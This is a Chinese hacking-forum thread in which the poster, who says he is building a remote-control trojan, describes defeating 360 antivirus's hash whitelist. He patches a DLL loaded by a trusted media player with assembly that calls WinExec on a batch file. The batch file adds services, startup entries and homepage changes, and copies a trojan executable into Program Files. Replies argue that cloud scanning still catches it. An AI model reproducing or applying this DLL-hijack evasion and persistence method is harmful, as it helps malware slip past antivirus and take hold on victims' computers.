过360提示,进行敏感操作 ,小白看不懂，谁给解释下。

ccccwjl

最近想写一款远控,看这360提示很不爽,于是就想办法将360过掉
360现在开始认MD5了,数据库里面有的MD5值就放行,提示安全
数据库里面没有的MD5对于敏感操作就会提示,其实过的办法也很白痴
先找一个皮皮播放器一类的软件,因为数据库里面有PIPIPlayer.exe的MD5,所以进行敏感操作的时候不会提示未知
PIPIPlayer.exe需要一个运行库MFC71.dll,我将MFC71.dll用OD载入,找空白区域写入
  ASCII "ie.bat",0
  DB 00
  PUSH 0
  NOP
  PUSH MFC71.7C21CF30
  CALL kernel32.WinExec
  JMP MFC71.7C14F41A
修改入口点,再创建一个ie.bat
ie.bat可以进行敏感的操作,例如添加服务,添加启动项,修改首页等
注意,添加启动项时候要先添加,再将程序复制到添加的路径,直接添加还是会提示未知的
我做了一个实例上传上去,这个是添加启动项的,运行PIPIPlayer.exe后会将muma.exe拷贝到C:\Program Files\Help...\
并添加启动项,360会提示安全启动项的
这样有价值的漏洞我都共享了,要是版主不加精以后都不发漏洞了!!
邮箱:Crack4@qq.com
By:契约者-黑

MPKYJoJO

不懂 但学习了！

小紫英

还是会被云查杀扫出来的，一体检就悲剧了，另外，这个不是360的漏洞，是利用的白程序的漏洞
再次印证一句话，不怕神一样的对手，就怕猪一样的队友

vanbasten111

队友押韵一点.............

庄生

回复 3楼 小紫英 的帖子

是猪一样的队友

这样押韵

小紫英

回复 5楼 5364721 的帖子

你转了两个广告贴……

小紫英

回复 4楼 vanbasten111 的帖子

搜狗不给力，待会骚扰王小川去

庄生

回复 6楼 小紫英 的帖子

= =

晕，那人刚才把样本删了

这不怪我啊

leisong

http://forum.darkst.com/thread-68195-1-2.html

转贴要贴地址

DLL劫持过不了云查杀，DLL被改就不在白名单，加载后无法通过云查杀

√×√×√√×

楼主这方法已经反馈过了，证实是没法过主防的